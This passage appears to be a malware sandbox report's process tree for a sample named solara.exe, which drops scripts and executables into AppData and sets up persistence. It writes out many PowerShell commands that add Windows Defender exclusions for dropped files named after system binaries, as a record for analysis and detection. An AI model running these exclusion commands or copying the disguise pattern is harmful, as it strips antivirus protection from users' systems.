C:\Windows\Temp\{AAD79DE8-26AF-47AD-B98E-E067E98A9BFC}\.cr\vc_redist.x64.exe"C:\Windows\Temp\{AAD79DE8-26AF-47AD-B98E-E067E98A9BFC}\.cr\vc_redist.x64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" -burn.filehandle.attached=540 -burn.filehandle.self=548 /install /quiet /norestart4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1544
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\solara.exe"C:\Users\Admin\AppData\Local\Temp\solara.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4528 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3412 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"5⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\Services\dllhost.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\sppsvc.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Common Files\System\csrss.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:4372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\Refcrt.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\RuntimeBroker.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Local Settings\lsass.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft\Edge\lsass.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows NT\Accessories\en-US\cmd.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Pictures\Camera Roll\RuntimeBroker.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3832
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\SppExtComObj.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Media Player\lsass.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Vss\RuntimeBroker.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\TextInputHost.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\LiveKernelReports\Refcrt.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Offline\backgroundTaskHost.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3256
-
-
C:\Users\Default User\sppsvc.exe"C:\Users\Default User\sppsvc.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3048 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:5744
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:1592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:5372
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:5408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:4132
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:2440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:2716
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:3152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:5336
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:4028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:4620
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:1640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:5756
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:5164
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:716
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:4336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:5064
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:5488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:2388
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:3684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:4100
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:5712
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:5300
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:3604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:5520
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:4288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:1548
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:1956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:2184
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:4760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:4368
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:5364
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:5724
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:5508
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:3728
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:4348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:3664
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:2208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:5380
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:1912
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:5836
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:5532
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:2912
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:3476
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:1300
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:3508
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:464
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:6304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:4756
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:6188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:5996
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:6632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:872
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:6692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:5820
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:6376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:6132
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:6548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:5788
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:6500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:6160
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:7084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:6216
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:6576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:6296
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:7148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:6368
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:7204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:6440
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:7184
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:6492
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:6992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:6564
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:7264
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:6704
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:6320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:6748
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:5896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:6840
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:5592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:6880
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:7592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:6928
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:7644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:6984
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:7380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:7048
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:7788
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:7136
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:7896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:6316
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:7568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:6604
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:8036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:7196
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:7604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:7276
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:8108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:7388
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:7892
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:7452
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:8164
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:7516
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:3436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:7680
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:8352
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:7716
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:8232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:7764
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:8568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:7840
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:8648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:7872
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:8704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:7972
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:8632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:8028
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:8804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:8096
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:8924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:8172
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:8492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:6512
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:8508
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:7540
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:8612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:8208
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:9168
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:8300
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:9160
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:8364
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:8260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:8408
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:8948
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:8480
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:8960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:8588
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:9776
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:8692
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:9912
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:8784
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:10112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:8844
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:10192
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:8892
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:9748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:8980
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:9632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:9060
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:9896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:9136
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:10408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:3524
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:10012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:9024
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:10400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:9656
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:10144
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:9700
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:10080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:9788
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:10272
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:9884
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:10352
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:9968
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:10904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:10040
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:11044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:10124
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:11052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:10220
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:11152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:10264
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:2724
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:10360
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:744
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:10460
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:4396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:10528
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:10500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:10588
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:10076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:10632
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:11004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:10684
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:4904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:10748
-
C:\Windows\system32\notepad.exenotepad.exe8⤵PID:2544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VDNADHaqjn.bat" "7⤵PID:10800
-
